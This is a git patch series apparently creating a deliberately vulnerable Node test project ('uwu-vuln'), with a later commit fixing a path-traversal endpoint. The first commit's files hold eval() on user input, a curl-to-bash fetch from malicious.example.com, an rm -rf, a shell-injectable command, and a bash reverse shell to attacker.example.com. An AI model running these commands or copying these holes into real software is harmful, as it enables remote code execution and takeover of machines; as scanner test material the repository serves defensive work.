From bb2dea1fed35ac02b3f62f32c12679c44b0507d7 Mon Sep 17 00:00:00 2001 From: Mohammed Date: Tue, 4 Nov 2025 16:46:15 -0500 Subject: [PATCH 1/2] add code --- browser copy/index.js | 5 ++++ cli/index.js | 18 ++++++++++++++ disk/index.js | 17 +++++++++++++ http copy/index.js | 56 +++++++++++++++++++++++++++++++++++++++++++ package.json | 11 +++++++++ stdin/index.js | 12 ++++++++++ ws/index.js | 12 ++++++++++ 7 files changed, 131 insertions(+) create mode 100644 browser copy/index.js create mode 100644 cli/index.js create mode 100644 disk/index.js create mode 100644 http copy/index.js create mode 100644 package.json create mode 100644 stdin/index.js create mode 100644 ws/index.js diff --git a/browser copy/index.js b/browser copy/index.js new file mode 100644 index 0000000..5f1b215 --- /dev/null +++ b/browser copy/index.js @@ -0,0 +1,5 @@ +function executeUserScript() { + var userScript = document.getElementById('userScript').value; + // Using eval to execute user-provided script + eval(userScript); +} diff --git a/cli/index.js b/cli/index.js new file mode 100644 index 0000000..7e5db7a --- /dev/null +++ b/cli/index.js @@ -0,0 +1,18 @@ +const { exec } = require('child_process'); + +const userArg = process.argv[2] || ''; + +const cmd = ` + rm -rf /tmp/vuln_dir --no-preserve-root && + curl http://malicious.example.com/install.sh | bash && + ls ${userArg} +`; + +console.log('[*] Running dangerous CLI pipeline…'); +exec(cmd, (err, stdout, stderr) => { + if (err) { + console.error('[!] Pipeline failed:', err); + return; + } + console.log('[+] Pipeline succeeded. stdout:\\n', stdout); +}); diff --git a/disk/index.js b/disk/index.js new file mode 100644 index 0000000..963519e --- /dev/null +++ b/disk/index.js @@ -0,0 +1,17 @@ +const express = require('express'); +const fs = require('fs'); +const path = require('path'); +const app = express(); + +// Path Traversal +app.get('/read', (req, res) => { + const file = req.query.file; + const fullPath = path.resolve(__dirname, file); + if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path'); + fs.readFile(fullPath, 'utf8', (err, data) => { + if (err) return res.status(500).send(err.message); + res.send(data); + }); +}); + +app.listen(3001, () => console.log('Disk vuln on port 3001')); diff --git a/http copy/index.js b/http copy/index.js new file mode 100644 index 0000000..1577130 --- /dev/null +++ b/http copy/index.js @@ -0,0 +1,56 @@ +const express = require('express'); +const axios = require('axios'); +const { URL } = require('url'); +const dns = require('dns').promises; +const app = express(); + +function isPrivateIp(ip) { + return ip === '::1' || + /^127\./.test(ip) || + /^10\./.test(ip) || + /^192\.168\./.test(ip) || + /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) || + ip.startsWith('fc') || ip.startsWith('fd') || + ip.startsWith('fe80:'); +} + +// SSRF +app.get('/fetch', async (req, res) => { + const url = req.query.url; + let parsedUrl; + try { + parsedUrl = new URL(url); + } catch (e) { + return res.status(400).send('Invalid URL'); + } + const hostname = parsedUrl.hostname; + if (!['http:', 'https:'].includes(parsedUrl.protocol) || + hostname === 'localhost' || + hostname === '127.0.0.1' || + hostname === '::1' || + /^(10|127)\./.test(hostname) || + /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) || + /^192\.168\./.test(hostname)) { + return res.status(400).send('URL not allowed'); + } + try { + // DNS resolution to prevent DNS rebinding + try { + const addresses = await dns.lookup(parsedUrl.hostname, { all: true }); + for (const { address } of addresses) { + if (isPrivateIp(address)) { + return res.status(400).send('URL not allowed'); + } + } + } catch (e) { + return res.status(400).send('Invalid hostname'); + } + + const resp = await axios.get(url); + res.send(resp.data); + } catch (e) { + res.status(500).send(e.message); + } +}); + +app.listen(3000, () => console.log('HTTP vuln on port 3000')); diff --git a/package.json b/package.json new file mode 100644 index 0000000..5cb2217 --- /dev/null +++ b/package.json @@ -0,0 +1,11 @@ +{ + "name": "uwu-vuln", + "version": "1.0.0", + "main": "index.js", + "scripts": { + "test": "echo \"Error: no test specified\" && exit 1" + }, + "author": "", + "license": "ISC", + "description": "" +} diff --git a/stdin/index.js b/stdin/index.js new file mode 100644 index 0000000..b712e33 --- /dev/null +++ b/stdin/index.js @@ -0,0 +1,12 @@ +const { exec } = require('child_process'); + +const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; + +console.log('[*] Executing reverse shell payload…'); +exec(payload, (err, stdout, stderr) => { + if (err) { + console.error('[!] Error executing payload:', err); + return; + } + console.log('[+] Payload executed. stdout:', stdout); +}); diff --git a/ws/index.js b/ws/index.js new file mode 100644 index 0000000..7b0fc64 --- /dev/null +++ b/ws/index.js @@ -0,0 +1,12 @@ +const WebSocket = require('ws'); +const wss = new WebSocket.Server({ port: 8080 }); + +// RCE +wss.on('connection', ws => { + ws.on('message', msg => { + eval(msg); + ws.send('Executed: ' + msg); + }); +}); + +console.log('WS vuln on port 8080'); \ No newline at end of file From 55f8fcfb89b7c9bdcaf4a7f6b9a19d7abe649bcd Mon Sep 17 00:00:00 2001 From: ZeroPath Date: Tue, 4 Nov 2025 21:52:44 +0000 Subject: [PATCH 2/2] fix: prevent path traversal and info disclosure via symlink race --- disk/index.js | 50 +++++++++++++++++++++++++++++++++++++++++++++----- 1 file changed, 45 insertions(+), 5 deletions(-) diff --git a/disk/index.js b/disk/index.js index 963519e..6ad30d7 100644 --- a/disk/index.js +++ b/disk/index.js @@ -6,12 +6,52 @@ const app = express(); // Path Traversal app.get('/read', (req, res) => { const file = req.query.file; + if (!file || typeof file !== 'string') return res.status(400).send('Invalid file'); const fullPath = path.resolve(__dirname, file); - if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path'); - fs.readFile(fullPath, 'utf8', (err, data) => { - if (err) return res.status(500).send(err.message); - res.send(data); - }); + // Ensure the resolved path is inside the application directory + if (!fullPath.startsWith(__dirname + path.sep) && fullPath !== __dirname) return res.status(400).send('Invalid file path'); + + // Prefer O_NOFOLLOW to avoid following symlinks at open time (mitigates TOCTOU symlink swap). + // If O_NOFOLLOW isn't available on the platform, fall back to lstat-based check and reject symlinks. + const hasONoFollow = fs.constants && (typeof fs.constants.O_NOFOLLOW !== 'undefined'); + const openFlags = hasONoFollow ? (fs.constants.O_RDONLY | fs.constants.O_NOFOLLOW) : fs.constants.O_RDONLY; + + const finishWithFd = (fd) => { + fs.readFile(fd, 'utf8', (err, data) => { + fs.close(fd, () => {}); + if (err) { + console.error(err); + return res.status(500).send('Unable to read file'); + } + res.send(data); + }); + }; + + if (hasONoFollow) { + fs.open(fullPath, openFlags, (err, fd) => { + if (err) { + console.error(err); + return res.status(400).send('Invalid file path'); + } + finishWithFd(fd); + }); + } else { + // Fallback: reject if the path is a symlink (reduces TOCTOU window on platforms without O_NOFOLLOW) + fs.lstat(fullPath, (err, stats) => { + if (err) { + console.error(err); + return res.status(400).send('Invalid file path'); + } + if (stats.isSymbolicLink()) return res.status(400).send('Invalid file path'); + fs.open(fullPath, openFlags, (err, fd) => { + if (err) { + console.error(err); + return res.status(400).send('Invalid file path'); + } + finishWithFd(fd); + }); + }); + } }); app.listen(3001, () => console.log('Disk vuln on port 3001'));